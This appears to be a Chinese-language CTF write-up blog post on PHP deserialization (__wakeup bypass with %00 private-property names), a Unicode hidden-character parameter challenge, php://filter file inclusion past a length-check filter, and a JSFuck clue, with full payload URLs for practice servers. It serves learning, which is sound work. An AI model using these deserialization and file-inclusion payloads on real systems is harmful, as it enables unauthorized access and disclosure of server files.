ctf的一些题目

反序列化题目

[极客大挑战 2019]PHP1

前置知识:

__construct:创建类的时候进行初始化
__wakeup:函数反序列化的时候自动调用
__destruct:对象结束的时候自动调用
__construct:创建对象自动调用

首先扫盘,发现www.zip
image-20231117182156989

研究class.php的代码

include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

经过代码审计后整理出:

首先__construct
然后在结束时__destruct进行判断检测:
password==100
username==admin
结束的时候进行__wake反序列化导致username==guset

接下来构造反序列化代码:

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}

$a = new Name('admin',100);
echo serialize($a);
?>

得到结果:

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

回到index.php

image-20231117113944004

经过反序列化函数后要调用__wakeup魔术方法,所以我们要绕过__wakeup函数:

让类名与后面对应的字数不匹配:

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

注意:私有属性在序列化后会在字符串前加上/0的前缀,但复制后不会显示出来

O:4:"Name":3:{s:14:"口Name口username";s:5:"admin";s:14:"口Name口password";i:100;}

要把口改成%00

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

最终payload:

http://f8610277-461b-4f1b-ae6f-5f5341d0c73d.node4.buuoj.cn:81/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

[SWPUCTF 2021 新生赛]ez_unserialize

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

很容易得出序列化代码:

 <?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }
    
}

    $a=new wllm();
    echo serialize($a);

?>

payload:

http://node4.anna.nssctf.cn:28766/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

[NISACTF 2022]checkin ktrol

这题不算反序列化,但是暂时放在这里

首先观察题干

image-20231117172635719

刚开始看,我就想不就是传入两个参数直接拿下,

image-20231117172831696

后来发现果然没有这么简单,检查半天发现不是拼写错误

看到题目的提示

image-20231117172951482

于是乎在这段代码中发现了无法显示的unicode字符
image-20231117173124842

这些字符无法打印,想必就是传入参数时缺少了这些字符
放入vscode中观察

image-20231117173306710

随后构造传参:

image-20231117181256302这些字符是无法打印的,所以我们需要用urlencode编码加密一下

加密后得到结果

ahahahaha%3Djitanglailo%26%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan%3D%E2%80%AE%E2%81%A6%2B%21%21%E2%81%A9%E2%81%A6%26+%E2%80%AE%E2%81%A6+Flag%21%E2%81%A9%E2%81%A6N1SACTF

只要把乱码部分进行url编码,其余部分的符号保持不变

ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

或者把所有特殊字符单独提取出来进行url编码

image-20231117180021890

得到payload:

?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

这个弄了好久了,某个地方打错一个字就没了

最后终于拿到flag

image-20231117182003738

这个Unicode编码还挺有意思的,以前都没见过,而且在复制一段字符串的时候还会复制到另一端字符串,或许这就是这种隐藏字符串的特征

image-20231117181707052

等有时间了去了解下

PHP伪协议

[鹏城杯 2022]简单包含

前置知识:
1.php伪协议

php://filter/read=convert.base64-encode/resource=[文件名]

详细内容可以参考这里https://segmentfault.com/a/1190000018991087

看题干

image-20231117131140918

首先先包含flag.phpimage-20231117131211626

发现有waf
包含index看看waf是什么

image-20231117131322367

页面是空白的,猜测内容里有flag字符导致被过滤
尝试使用php伪协议
得到如下数据:

PD9waHAKCiRwYXRoID0gJF9QT1NUWyJmbGFnIl07CgppZiAoc3RybGVuKGZpbGVfZ2V0X2NvbnRlbnRzKCdwaHA6Ly9pbnB1dCcpKSA8IDgwMCAmJiBwcmVnX21hdGNoKCcvZmxhZy8nLCAkcGF0aCkpIHsKICAgIGVjaG8gJ25zc2N0ZiB3YWYhJzsKfSBlbHNlIHsKICAgIEBpbmNsdWRlKCRwYXRoKTsKfQo/PgoKPGNvZGU+PHNwYW4gc3R5bGU9ImNvbG9yOiAjMDAwMDAwIj4KPHNwYW4gc3R5bGU9ImNvbG9yOiAjMDAwMEJCIj4mbHQ7P3BocCZuYnNwOzxiciAvPmhpZ2hsaWdodF9maWxlPC9zcGFuPjxzcGFuIHN0eWxlPSJjb2xvcjogIzAwNzcwMCI+KDwvc3Bhbj48c3BhbiBzdHlsZT0iY29sb3I6ICMwMDAwQkIiPl9fRklMRV9fPC9zcGFuPjxzcGFuIHN0eWxlPSJjb2xvcjogIzAwNzcwMCI+KTs8YnIgLz5pbmNsdWRlKDwvc3Bhbj48c3BhbiBzdHlsZT0iY29sb3I6ICMwMDAwQkIiPiRfUE9TVDwvc3Bhbj48c3BhbiBzdHlsZT0iY29sb3I6ICMwMDc3MDAiPls8L3NwYW4+PHNwYW4gc3R5bGU9ImNvbG9yOiAjREQwMDAwIj4iZmxhZyI8L3NwYW4+PHNwYW4gc3R5bGU9ImNvbG9yOiAjMDA3NzAwIj5dKTs8YnIgLz48L3NwYW4+PHNwYW4gc3R5bGU9ImNvbG9yOiAjRkY4MDAwIj4vL2ZsYWcmbmJzcDtpbiZuYnNwOy92YXIvd3d3L2h0bWwvZmxhZy5waHA7PC9zcGFuPgo8L3NwYW4+CjwvY29kZT48YnIgLz4K

解码后得

<?php

$path = $_POST["flag"];

if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
    echo 'nssctf waf!';
} else {
    @include($path);
}
?>

<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php&nbsp;<br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag&nbsp;in&nbsp;/var/www/html/flag.php;</span>
</span>
</code><br />

在if语句中:

if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path))

首先要满足输入的数据要大于800然后不能有flag

最终payload:

a=aasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdsdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdaasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdas&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

js

[HDCTF 2023]Welcome To HDCTF 2023

view-source:中找到game.js

image-20231117134651104

或者直接搜alert

形如(+[![]]+[])[+[]]+(这样的
这里的加密是jsfuck

直接alert(seeeeeeeecret)
或者用jsfuck

posted @ 2023-11-17 12:02  redfish999  阅读(46)  评论(0编辑  收藏  举报